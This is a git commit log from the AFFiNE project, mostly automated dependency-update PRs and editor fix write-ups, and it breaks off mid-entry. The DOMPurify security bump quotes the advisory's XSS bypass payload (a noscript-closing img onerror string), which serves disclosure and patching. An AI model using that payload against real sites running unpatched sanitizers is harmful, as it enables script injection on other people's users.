This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.0` → `3.3.2`](https://renovatebot.com/diffs/npm/dompurify/3.3.0/3.3.2) | ![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.3.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.3.0/3.3.2?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2026-0540](https://nvd.nist.gov/vuln/detail/CVE-2026-0540)

DOMPurify 3.1.3 through 3.3.1 and 2.5.3 through 2.5.8, fixed in 2.5.9
and 3.3.2, contain a cross-site scripting vulnerability that allows
attackers to bypass attribute sanitization by exploiting five missing
rawtext elements (noscript, xmp, noembed, noframes, iframe) in the
`SAFE_FOR_XML` regex. Attackers can include payloads like
`</noscript><img src=x onerror=alert(1)>` in attribute values to execute
JavaScript when sanitized output is placed inside these unprotected
rawtext contexts.

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

###
[`v3.3.2`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.2):
DOMPurify 3.3.2

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.1...3.3.2)

- Fixed a possible bypass caused by jsdom's faulty raw-text tag parsing,
thanks multiple reporters
- Fixed a prototype pollution issue when working with custom elements,
thanks [@christos-eth](https://redirect.github.com/christos-eth)
- Fixed a lenient config parsing in `_isValidAttribute`, thanks
[@christos-eth](https://redirect.github.com/christos-eth)
- Bumped and removed several dependencies, thanks
[@Rotzbua](https://redirect.github.com/Rotzbua)
- Fixed the test suite after bumping dependencies, thanks
[@Rotzbua](https://redirect.github.com/Rotzbua)

###
[`v3.3.1`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.1):
DOMPurify 3.3.1

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.0...3.3.1)

- Updated `ADD_FORBID_CONTENTS` setting to extend default list, thanks
[@MariusRumpf](https://redirect.github.com/MariusRumpf)
- Updated the ESM import syntax to be more correct, thanks
[@binhpv](https://redirect.github.com/binhpv)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-06 19:04:08 +08:00
congzhou09 c249011238 fix(editor): note-edgeless-block dimensions mismatch content at non-100% scale (#14577)
### Problem
●In edgeless mode, when the `note-edgeless-block` is scaled below 100%,
its outer dimension becomes larger than its content region. This extra
invisible region will block some user interactions such as clicks and
hovers on editing elements underneath.

<img width="1060" height="541" alt="note-elem-block-click"
src="https://github.com/user-attachments/assets/860d7a4f-d159-437b-bbe8-4560e2463e3d"
/>

●The following video demonstrates this issue:


https://github.com/user-attachments/assets/3b719b25-0d7e-496b-9507-6aa65ed0a797


### Solution
●The root cause is that `transform: scale(...)` CSS property (which
implements the scale) is currently applied to its **inner root element**
instead of itself, and the solution is to move this CSS property to the
proper place.

### After
●The video below shows the behavior after this fix.



https://github.com/user-attachments/assets/e2dbd75d-c2ea-460d-90a1-5cc13e12d5b8



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Centralized CSS scaling for graphics and edgeless note blocks into
dedicated public methods; rendering now uses these methods instead of
inline transform calculations.
* **Tests**
* Updated end-to-end checks to read scale directly from the edgeless
note element and use a more flexible transform-matching pattern.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-06 19:03:36 +08:00
DarkSky 7f5f7e79df feat(server): refactor mcp (#14579)
#### PR Dependency Tree


* **PR #14579** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Full JSON-RPC MCP endpoint with batch requests, per-message
validation, method dispatch (initialize, ping, tools/list, tools/call)
and request cancellation
* Tool listing and execution with input validation, standardized
results, and improved error responses

* **Chores**
  * Removed an external protocol dependency
  * Bumped MCP server version to 1.0.1
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-06 06:35:34 +08:00
DarkSky fff04395bc chore: update docs 2026-03-06 01:51:09 +08:00
renovate[bot] bbc01533d7 chore: bump up multer version to v2.1.1 [SECURITY] (#14576)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [multer](https://redirect.github.com/expressjs/multer) | [`2.1.0` → `2.1.1`](https://renovatebot.com/diffs/npm/multer/2.1.0/2.1.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/multer/2.1.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/multer/2.1.0/2.1.1?slim=true) |

### GitHub Vulnerability Alerts

####
[CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload,
potentially causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

####
[CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

####
[CVE-2026-3520](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2)

### Impact

A vulnerability in Multer versions < 2.1.1 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing stack overflow.

### Patches

Users should upgrade to `2.1.1`

### Workarounds

None

### Resources

-
https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2
- https://www.cve.org/CVERecord?id=CVE-2026-3520
-
https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752
- https://cna.openjsf.org/security-advisories.html

---

### Release Notes

<details>
<summary>expressjs/multer (multer)</summary>

###
[`v2.1.1`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#211)

[Compare
Source](https://redirect.github.com/expressjs/multer/compare/v2.1.0...v2.1.1)

- Fix [CVE-2026-3520](https://www.cve.org/CVERecord?id=CVE-2026-3520)
([GHSA-5528-5vmv-3xc2](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2))
- fix error/abort handling

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-06 01:04:48 +08:00
congzhou09 e31cca3354 fix(editor): non-canvas block size/position in embed-edgeless-doc at non-1 zoom (#14074)
### Problem
●Similar to
[PR#14015](https://github.com/toeverything/AFFiNE/pull/14015), the
container's own scaling factor (`viewScale`) was not taken into account.
This time the issue affects **non-canvas blocks** (e.g. `edgeless-note`,
`edgeless-image`, and any component extending `GfxBlockComponent`).
●The following image and video show the case when zoom is 0.5.

<img width="822" height="414" alt="image"
src="https://github.com/user-attachments/assets/cee1cb88-2764-443c-aa7a-0443308b0e29"
/>


https://github.com/user-attachments/assets/3c744579-16c4-4f10-b421-e0606da1269f

### Solution
●Incorporated `viewScale` into the CSS `translate` calculation for all
`GfxBlockComponent` instances.

### Additional Improvement
●Minor refactor: the class returned by `toGfxBlockComponent()` now
reuses the original `getCSSTransform()` implementation from
`GfxBlockComponent.prototype` via `.call(this)`, eliminating duplicated
code.

### After
●The refined is as follows.


https://github.com/user-attachments/assets/24de0429-63a3-45a7-9b31-d91a4279e233


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Improved viewport scaling so visual transforms (translation and zoom)
correctly account for view scale, yielding more consistent rendering
during zoom and pan.
* Centralized transform calculation to a shared implementation, reducing
duplication and ensuring uniform behavior across views.

<sub>✏️ Tip: You can customize this high-level summary in your review
settings.</sub>
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-03-04 11:38:09 +00:00
DarkSky 11bc333714 Merge commit '99b07c2ee14dea1383ca6cd63633c3df542f2955' into canary 2026-03-04 01:18:30 +08:00
DarkSky 99b07c2ee1 fix: ios marketing version 2026-03-04 01:17:14 +08:00
renovate[bot] fc9b99cd17 chore: bump up ava version to v7 (#14563)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ava](https://avajs.dev) ([source](https://redirect.github.com/avajs/ava)) | [`^6.4.1` → `^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/ava/7.0.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ava/6.4.1/7.0.0?slim=true) |
| [ava](https://avajs.dev) ([source](https://redirect.github.com/avajs/ava)) | [`^6.4.0` → `^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/ava/7.0.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ava/6.4.1/7.0.0?slim=true) |

---

### Release Notes

<details>
<summary>avajs/ava (ava)</summary>

###
[`v7.0.0`](https://redirect.github.com/avajs/ava/releases/tag/v7.0.0)

[Compare
Source](https://redirect.github.com/avajs/ava/compare/v6.4.1...v7.0.0)

##### What's Changed

- Replace `strip-ansi` with `node:util.stripVTControlCharacters` by
[@fisker](https://redirect.github.com/fisker) in
[#3403](https://redirect.github.com/avajs/ava/pull/3403)
- Remove support for Node.js 18 and 23; require 20.19 or newer, 22.20 or
newer or 24,12 or newer; update dependencies including transitive `glob`
by [@novemberborn](https://redirect.github.com/novemberborn) in
[#3416](https://redirect.github.com/avajs/ava/pull/3416)

**Full Changelog**:
<https://github.com/avajs/ava/compare/v6.4.1...v7.0.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-03 17:47:47 +08:00
DarkSky 2137f68871 fix(server): normalize mail server name (#14564)
fix #14562 
fix #14226 
fix #14192


#### PR Dependency Tree


* **PR #14564** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* SMTP and fallback SMTP name now default to empty and will use the
system hostname when not set.
* HELO hostname resolution includes stricter normalization/validation
for more reliable mail handshakes.

* **Documentation**
* Updated admin and config descriptions to explain hostname/HELO
behavior and fallback.

* **Tests**
* Added tests covering hostname normalization and rejection of invalid
HELO values.

* **Chores**
  * Updated example env and ignore rules.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-03 15:51:32 +08:00
renovate[bot] 75efa854bf chore: bump up apple-actions/import-codesign-certs action to v6 (#14561)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [apple-actions/import-codesign-certs](https://redirect.github.com/apple-actions/import-codesign-certs) | action | major | `v5` → `v6` |

---

### Release Notes

<details>
<summary>apple-actions/import-codesign-certs
(apple-actions/import-codesign-certs)</summary>

###
[`v6`](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v5...v6)

[Compare
Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v5...v6)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-03 12:14:10 +08:00
renovate[bot] c0139abf79 chore: bump up actions/setup-java action to v5 (#14554)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/setup-java](https://redirect.github.com/actions/setup-java) | action | major | `v4` → `v5` |

---

### Release Notes

<details>
<summary>actions/setup-java (actions/setup-java)</summary>

###
[`v5`](https://redirect.github.com/actions/setup-java/compare/v4...v5)

[Compare
Source](https://redirect.github.com/actions/setup-java/compare/v4...v5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 20:31:47 +08:00
renovate[bot] 5a38e765bd chore: bump up actions/setup-node action to v6 (#14555)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/setup-node](https://redirect.github.com/actions/setup-node) | action | major | `v4` → `v6` |

---

### Release Notes

<details>
<summary>actions/setup-node (actions/setup-node)</summary>

### [`v6`](https://redirect.github.com/actions/setup-node/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/setup-node/compare/v5...v6)

### [`v5`](https://redirect.github.com/actions/setup-node/compare/v4...v5)

[Compare
Source](https://redirect.github.com/actions/setup-node/compare/v4...v5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 20:31:23 +08:00
renovate[bot] d3dcdd47ee chore: bump up actions/setup-python action to v6 (#14556)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/setup-python](https://redirect.github.com/actions/setup-python) | action | major | `v5` → `v6` |

---

### Release Notes

<details>
<summary>actions/setup-python (actions/setup-python)</summary>

### [`v6`](https://redirect.github.com/actions/setup-python/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/setup-python/compare/v5...v6)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 20:31:01 +08:00
DarkSky 727c9d6d71 fix: server build env 2026-03-02 20:23:00 +08:00
DarkSky 274f491e49 fix: aarch64 build 2026-03-02 19:49:52 +08:00
congzhou09 478138493a fix(editor): invalid caret in note-edgeless-block on focus (#14229)
### Problem
● In edgeless mode, when starting to edit, `note-block` exhibits two
types of invalid caret behavior:
(1) **Title Region Misalignment**: Clicking on the title region
incorrectly generates the caret in the first line of the note content,
rather than in the title itself.
(2) **Vanishing Caret at Line End**: When clicking in the empty space
beyond the end of a text section, the caret appears momentarily at the
line's end but disappears immediately.
● The following video demonstrates these issues:


https://github.com/user-attachments/assets/db9c2c50-709f-4d32-912c-0f01841d2024


### Solution
● **Title Click Interception**: Added a check to determine if the click
coordinates fall in the title region. If so, the caret positioning is
now handled by a dedicated logic path. Otherwise, it falls back to the
existing note-content logic as before.
● **Range Normalization**: When the generated `range.startContainer` is
not a `TextNode`, try to find the most appropriate `TextNode` and update
the `range` accordingly.

### After
● The video below shows the behavior after this fix.


https://github.com/user-attachments/assets/b2f70b64-1fc6-4049-8379-8bcf3a488a05



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
  * Clicking a page block title no longer creates unwanted paragraphs and
    reliably focuses the title.
  * Paragraph creation now occurs only when needed and focus is applied
    only after successful creation.
  * Click coordinates are clamped to container bounds to prevent misplaced
    cursors or focus.

* **Improvements**
  * Caret normalization: clicks place the caret at the last meaningful
    text position for consistent single-cursor behavior.

* **Tests**
  * Added end-to-end coverage for caret placement and focus transitions.
  * New ratio-based click/double-click test utilities and a helper for
    double-clicking note bodies.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-02 18:51:23 +08:00
renovate[bot] 5464d1a9ce chore: bump up multer version to v2.1.0 [SECURITY] (#14544)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [multer](https://redirect.github.com/expressjs/multer) | [`2.0.2` → `2.1.0`](https://renovatebot.com/diffs/npm/multer/2.0.2/2.1.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/multer/2.1.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/multer/2.0.2/2.1.0?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload,
potentially causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

#### [CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

---

### Release Notes

<details>
<summary>expressjs/multer (multer)</summary>

### [`v2.1.0`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#210)

[Compare
Source](https://redirect.github.com/expressjs/multer/compare/v2.0.2...v2.1.0)

- Add `defParamCharset` option for UTF-8 filename support
([#1210](https://redirect.github.com/expressjs/multer/pull/1210))
- Fix [CVE-2026-2359](https://www.cve.org/CVERecord?id=CVE-2026-2359)
([GHSA-v52c-386h-88mc](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc))
- Fix [CVE-2026-3304](https://www.cve.org/CVERecord?id=CVE-2026-3304)
([GHSA-xf7r-hgr6-v32p](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:59:38 +08:00
renovate[bot] 4c40dcacd9 chore: bump up actions/setup-go action to v6 (#14553)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/setup-go](https://redirect.github.com/actions/setup-go) | action | major | `v5` → `v6` |

---

### Release Notes

<details>
<summary>actions/setup-go (actions/setup-go)</summary>

### [`v6`](https://redirect.github.com/actions/setup-go/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/setup-go/compare/v5...v6)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:59:16 +08:00
renovate[bot] 76d28aaa38 chore: bump up @types/supertest version to v7 (#14546)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@types/supertest](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/supertest) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/supertest)) | [`^6.0.2` → `^7.0.0`](https://renovatebot.com/diffs/npm/@types%2fsupertest/6.0.3/7.2.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@types%2fsupertest/7.2.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@types%2fsupertest/6.0.3/7.2.0?slim=true) |

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:58:48 +08:00
renovate[bot] 86f48240ce chore: bump up actions/github-script action to v8 (#14551)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/github-script](https://redirect.github.com/actions/github-script) | action | major | `v7` → `v8` |

---

### Release Notes

<details>
<summary>actions/github-script (actions/github-script)</summary>

### [`v8`](https://redirect.github.com/actions/github-script/releases/tag/v8): .0.0

[Compare
Source](https://redirect.github.com/actions/github-script/compare/v7...v8)

##### What's Changed

- Update Node.js version support to 24.x by
[@salmanmkc](https://redirect.github.com/salmanmkc) in
[#637](https://redirect.github.com/actions/github-script/pull/637)
- README for updating actions/github-script from v7 to v8 by
[@sneha-krip](https://redirect.github.com/sneha-krip) in
[#653](https://redirect.github.com/actions/github-script/pull/653)

##### ⚠️ Minimum Compatible Runner Version

**v2.327.1**\
[Release
Notes](https://redirect.github.com/actions/runner/releases/tag/v2.327.1)

Make sure your runner is updated to this version or newer to use this
release.

##### New Contributors

- [@salmanmkc](https://redirect.github.com/salmanmkc) made their
first contribution in
[#637](https://redirect.github.com/actions/github-script/pull/637)
- [@sneha-krip](https://redirect.github.com/sneha-krip) made
their first contribution in
[#653](https://redirect.github.com/actions/github-script/pull/653)

**Full Changelog**:
<https://github.com/actions/github-script/compare/v7.1.0...v8.0.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:58:23 +08:00
DarkSky c5d622531c feat: refactor copilot module (#14537) 2026-03-02 13:57:55 +08:00
renovate[bot] 60acd81d4b chore: bump up actions/labeler action to v6 (#14552)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/labeler](https://redirect.github.com/actions/labeler) | action | major | `v5` → `v6` |

---

### Release Notes

<details>
<summary>actions/labeler (actions/labeler)</summary>

### [`v6`](https://redirect.github.com/actions/labeler/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/labeler/compare/v5...v6)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 11:59:25 +08:00
renovate[bot] 78f567a178 chore: bump up actions/checkout action to v6 (#14550)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/checkout](https://redirect.github.com/actions/checkout) | action | major | `v4` → `v6` |

---

### Release Notes

<details>
<summary>actions/checkout (actions/checkout)</summary>

### [`v6`](https://redirect.github.com/actions/checkout/compare/v5...v6)

[Compare
Source](https://redirect.github.com/actions/checkout/compare/v5...v6)

### [`v5`](https://redirect.github.com/actions/checkout/compare/v4...v5)

[Compare
Source](https://redirect.github.com/actions/checkout/compare/v4...v5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 10:58:53 +08:00
renovate[bot] 784382cfb1 chore: bump up actions/cache action to v5 (#14549)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/cache](https://redirect.github.com/actions/cache) | action | major | `v4` → `v5` |

---

### Release Notes

<details>
<summary>actions/cache (actions/cache)</summary>

### [`v5`](https://redirect.github.com/actions/cache/compare/v4...v5)

[Compare
Source](https://redirect.github.com/actions/cache/compare/v4...v5)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 10:58:27 +08:00
renovate[bot] 342451be1b chore: bump up actions/attest-build-provenance action to v4 (#14547)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [actions/attest-build-provenance](https://redirect.github.com/actions/attest-build-provenance) | action | major | `v2` → `v4` |

---

### Release Notes

<details>
<summary>actions/attest-build-provenance
